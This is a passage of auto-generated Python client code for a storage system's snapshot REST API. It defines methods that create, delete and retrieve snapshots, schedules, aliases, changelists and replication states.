This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_snapshot_repstate_with_http_info(snapshot_repstate, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotRepstates snapshot_repstate: (required)
:return: CreateSnapshotRepstateResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_repstate'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_snapshot_repstate" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_repstate' is set
if ('snapshot_repstate' not in params or
params['snapshot_repstate'] is None):
raise ValueError("Missing the required parameter `snapshot_repstate` when calling `create_snapshot_repstate`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'snapshot_repstate' in params:
body_params = params['snapshot_repstate']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/repstates', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateSnapshotRepstateResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_snapshot_schedule(self, snapshot_schedule, **kwargs): # noqa: E501
"""create_snapshot_schedule # noqa: E501
Create a new schedule. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_snapshot_schedule(snapshot_schedule, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotScheduleCreateParams snapshot_schedule: (required)
:return: CreateSnapshotScheduleResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_snapshot_schedule_with_http_info(snapshot_schedule, **kwargs) # noqa: E501
else:
(data) = self.create_snapshot_schedule_with_http_info(snapshot_schedule, **kwargs) # noqa: E501
return data
def create_snapshot_schedule_with_http_info(self, snapshot_schedule, **kwargs): # noqa: E501
"""create_snapshot_schedule # noqa: E501
Create a new schedule. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_snapshot_schedule_with_http_info(snapshot_schedule, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotScheduleCreateParams snapshot_schedule: (required)
:return: CreateSnapshotScheduleResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_schedule'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_snapshot_schedule" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_schedule' is set
if ('snapshot_schedule' not in params or
params['snapshot_schedule'] is None):
raise ValueError("Missing the required parameter `snapshot_schedule` when calling `create_snapshot_schedule`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'snapshot_schedule' in params:
body_params = params['snapshot_schedule']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/snapshot/schedules', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateSnapshotScheduleResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_snapshot_snapshot(self, snapshot_snapshot, **kwargs): # noqa: E501
"""create_snapshot_snapshot # noqa: E501
Create a new snapshot. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_snapshot_snapshot(snapshot_snapshot, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotSnapshotCreateParams snapshot_snapshot: (required)
:return: SnapshotSnapshotExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_snapshot_snapshot_with_http_info(snapshot_snapshot, **kwargs) # noqa: E501
else:
(data) = self.create_snapshot_snapshot_with_http_info(snapshot_snapshot, **kwargs) # noqa: E501
return data
def create_snapshot_snapshot_with_http_info(self, snapshot_snapshot, **kwargs): # noqa: E501
"""create_snapshot_snapshot # noqa: E501
Create a new snapshot. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_snapshot_snapshot_with_http_info(snapshot_snapshot, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotSnapshotCreateParams snapshot_snapshot: (required)
:return: SnapshotSnapshotExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_snapshot'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_snapshot_snapshot" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_snapshot' is set
if ('snapshot_snapshot' not in params or
params['snapshot_snapshot'] is None):
raise ValueError("Missing the required parameter `snapshot_snapshot` when calling `create_snapshot_snapshot`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'snapshot_snapshot' in params:
body_params = params['snapshot_snapshot']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/snapshots', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotSnapshotExtended', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_snapshot_alias(self, snapshot_alias_id, **kwargs): # noqa: E501
"""delete_snapshot_alias # noqa: E501
Delete the snapshot alias # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_alias(snapshot_alias_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_alias_id: Delete the snapshot alias (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_snapshot_alias_with_http_info(snapshot_alias_id, **kwargs) # noqa: E501
else:
(data) = self.delete_snapshot_alias_with_http_info(snapshot_alias_id, **kwargs) # noqa: E501
return data
def delete_snapshot_alias_with_http_info(self, snapshot_alias_id, **kwargs): # noqa: E501
"""delete_snapshot_alias # noqa: E501
Delete the snapshot alias # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_alias_with_http_info(snapshot_alias_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_alias_id: Delete the snapshot alias (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_alias_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_snapshot_alias" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_alias_id' is set
if ('snapshot_alias_id' not in params or
params['snapshot_alias_id'] is None):
raise ValueError("Missing the required parameter `snapshot_alias_id` when calling `delete_snapshot_alias`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_alias_id' in params:
path_params['SnapshotAliasId'] = params['snapshot_alias_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/aliases/{SnapshotAliasId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_snapshot_aliases(self, **kwargs): # noqa: E501
"""delete_snapshot_aliases # noqa: E501
Delete all or matching snapshot aliases. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_aliases(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_snapshot_aliases_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.delete_snapshot_aliases_with_http_info(**kwargs) # noqa: E501
return data
def delete_snapshot_aliases_with_http_info(self, **kwargs): # noqa: E501
"""delete_snapshot_aliases # noqa: E501
Delete all or matching snapshot aliases. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_aliases_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_snapshot_aliases" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/aliases', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_snapshot_changelist(self, snapshot_changelist_id, **kwargs): # noqa: E501
"""delete_snapshot_changelist # noqa: E501
Delete the specified changelist. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_changelist(snapshot_changelist_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_changelist_id: Delete the specified changelist. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_snapshot_changelist_with_http_info(snapshot_changelist_id, **kwargs) # noqa: E501
else:
(data) = self.delete_snapshot_changelist_with_http_info(snapshot_changelist_id, **kwargs) # noqa: E501
return data
def delete_snapshot_changelist_with_http_info(self, snapshot_changelist_id, **kwargs): # noqa: E501
"""delete_snapshot_changelist # noqa: E501
Delete the specified changelist. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_changelist_with_http_info(snapshot_changelist_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_changelist_id: Delete the specified changelist. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_changelist_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_snapshot_changelist" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_changelist_id' is set
if ('snapshot_changelist_id' not in params or
params['snapshot_changelist_id'] is None):
raise ValueError("Missing the required parameter `snapshot_changelist_id` when calling `delete_snapshot_changelist`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_changelist_id' in params:
path_params['SnapshotChangelistId'] = params['snapshot_changelist_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/changelists/{SnapshotChangelistId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_snapshot_repstate(self, snapshot_repstate_id, **kwargs): # noqa: E501
"""delete_snapshot_repstate # noqa: E501
Delete the specified repstate. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_repstate(snapshot_repstate_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_repstate_id: Delete the specified repstate. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_snapshot_repstate_with_http_info(snapshot_repstate_id, **kwargs) # noqa: E501
else:
(data) = self.delete_snapshot_repstate_with_http_info(snapshot_repstate_id, **kwargs) # noqa: E501
return data
def delete_snapshot_repstate_with_http_info(self, snapshot_repstate_id, **kwargs): # noqa: E501
"""delete_snapshot_repstate # noqa: E501
Delete the specified repstate. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_repstate_with_http_info(snapshot_repstate_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_repstate_id: Delete the specified repstate. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_repstate_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_snapshot_repstate" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_repstate_id' is set
if ('snapshot_repstate_id' not in params or
params['snapshot_repstate_id'] is None):
raise ValueError("Missing the required parameter `snapshot_repstate_id` when calling `delete_snapshot_repstate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_repstate_id' in params:
path_params['SnapshotRepstateId'] = params['snapshot_repstate_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/repstates/{SnapshotRepstateId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_snapshot_schedule(self, snapshot_schedule_id, **kwargs): # noqa: E501
"""delete_snapshot_schedule # noqa: E501
Delete the schedule. This does not affect already created snapshots. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_schedule(snapshot_schedule_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_schedule_id: Delete the schedule. This does not affect already created snapshots. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_snapshot_schedule_with_http_info(snapshot_schedule_id, **kwargs) # noqa: E501
else:
(data) = self.delete_snapshot_schedule_with_http_info(snapshot_schedule_id, **kwargs) # noqa: E501
return data
def delete_snapshot_schedule_with_http_info(self, snapshot_schedule_id, **kwargs): # noqa: E501
"""delete_snapshot_schedule # noqa: E501
Delete the schedule. This does not affect already created snapshots. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_schedule_with_http_info(snapshot_schedule_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_schedule_id: Delete the schedule. This does not affect already created snapshots. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_schedule_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_snapshot_schedule" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_schedule_id' is set
if ('snapshot_schedule_id' not in params or
params['snapshot_schedule_id'] is None):
raise ValueError("Missing the required parameter `snapshot_schedule_id` when calling `delete_snapshot_schedule`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_schedule_id' in params:
path_params['SnapshotScheduleId'] = params['snapshot_schedule_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/snapshot/schedules/{SnapshotScheduleId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_snapshot_schedules(self, **kwargs): # noqa: E501
"""delete_snapshot_schedules # noqa: E501
Delete all snapshot schedules. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_schedules(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_snapshot_schedules_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.delete_snapshot_schedules_with_http_info(**kwargs) # noqa: E501
return data
def delete_snapshot_schedules_with_http_info(self, **kwargs): # noqa: E501
"""delete_snapshot_schedules # noqa: E501
Delete all snapshot schedules. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_schedules_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_snapshot_schedules" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/snapshot/schedules', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_snapshot_snapshot(self, snapshot_snapshot_id, **kwargs): # noqa: E501
"""delete_snapshot_snapshot # noqa: E501
Delete the snapshot. Deleted snapshots will be placed into a deleting state until the system can reclaim the space used by the snapshot. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_snapshot(snapshot_snapshot_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_snapshot_id: Delete the snapshot. Deleted snapshots will be placed into a deleting state until the system can reclaim the space used by the snapshot. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_snapshot_snapshot_with_http_info(snapshot_snapshot_id, **kwargs) # noqa: E501
else:
(data) = self.delete_snapshot_snapshot_with_http_info(snapshot_snapshot_id, **kwargs) # noqa: E501
return data
def delete_snapshot_snapshot_with_http_info(self, snapshot_snapshot_id, **kwargs): # noqa: E501
"""delete_snapshot_snapshot # noqa: E501
Delete the snapshot. Deleted snapshots will be placed into a deleting state until the system can reclaim the space used by the snapshot. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_snapshot_with_http_info(snapshot_snapshot_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_snapshot_id: Delete the snapshot. Deleted snapshots will be placed into a deleting state until the system can reclaim the space used by the snapshot. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_snapshot_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_snapshot_snapshot" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_snapshot_id' is set
if ('snapshot_snapshot_id' not in params or
params['snapshot_snapshot_id'] is None):
raise ValueError("Missing the required parameter `snapshot_snapshot_id` when calling `delete_snapshot_snapshot`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_snapshot_id' in params:
path_params['SnapshotSnapshotId'] = params['snapshot_snapshot_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/snapshots/{SnapshotSnapshotId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_snapshot_snapshots(self, **kwargs): # noqa: E501
"""delete_snapshot_snapshots # noqa: E501
Delete all or matching snapshots. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_snapshots(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str type: Only list snapshots matching this type.
:param str schedule: Only list snapshots created by this schedule.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_snapshot_snapshots_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.delete_snapshot_snapshots_with_http_info(**kwargs) # noqa: E501
return data
def delete_snapshot_snapshots_with_http_info(self, **kwargs): # noqa: E501
"""delete_snapshot_snapshots # noqa: E501
Delete all or matching snapshots. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_snapshots_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str type: Only list snapshots matching this type.
:param str schedule: Only list snapshots created by this schedule.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['type', 'schedule'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_snapshot_snapshots" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'type' in params:
query_params.append(('type', params['type'])) # noqa: E501
if 'schedule' in params:
query_params.append(('schedule', params['schedule'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/snapshots', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_snapshot_alias(self, snapshot_alias_id, **kwargs): # noqa: E501
"""get_snapshot_alias # noqa: E501
Retrieve snapshot alias information. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_alias(snapshot_alias_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_alias_id: Retrieve snapshot alias information. (required)
:return: SnapshotAliases
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_snapshot_alias_with_http_info(snapshot_alias_id, **kwargs) # noqa: E501
else:
(data) = self.get_snapshot_alias_with_http_info(snapshot_alias_id, **kwargs) # noqa: E501
return data
def get_snapshot_alias_with_http_info(self, snapshot_alias_id, **kwargs): # noqa: E501
"""get_snapshot_alias # noqa: E501
Retrieve snapshot alias information. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_alias_with_http_info(snapshot_alias_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_alias_id: Retrieve snapshot alias information. (required)
:return: SnapshotAliases
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_alias_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_snapshot_alias" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_alias_id' is set
if ('snapshot_alias_id' not in params or
params['snapshot_alias_id'] is None):
raise ValueError("Missing the required parameter `snapshot_alias_id` when calling `get_snapshot_alias`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_alias_id' in params:
path_params['SnapshotAliasId'] = params['snapshot_alias_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
